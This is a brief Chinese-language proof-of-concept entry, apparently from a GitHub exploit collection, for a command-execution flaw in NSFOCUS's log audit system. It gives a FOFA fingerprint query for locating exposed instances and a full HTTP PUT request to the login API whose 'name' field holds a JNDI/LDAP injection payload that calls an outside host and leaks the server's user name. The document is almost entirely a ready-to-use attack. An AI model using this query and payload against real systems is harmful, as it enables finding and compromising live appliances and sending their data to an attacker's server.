## 绿盟日志审计系统存在命令执行漏洞 ## fofa ``` "{{platformName}}" && icon_hash="-1566499661" ``` ## poc ``` PUT /api/v1/login HTTP/1.1 Host: Connection: keep-alive Content-Length: 36 sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122" Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 Accept-Language: zh_CN sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=C2CBDF46F7B53365D2ECE60AA645B673; sessionid=w0gr7fyrkt56tf6yc3sr0pw6mjl59txi {"name":"${jndi:ldap://${sys:user.name}.a24693ffbb.ipv6.1433.eu.org}","password":"2Y4W5F5h"} ``` ![image](https://github.com/wy876/POC/assets/139549762/a05a8dba-acfc-43d7-88c9-26f8ed6b01be) ![image](https://github.com/wy876/POC/assets/139549762/8df91e08-41cf-438b-88ed-5a559f20d18c)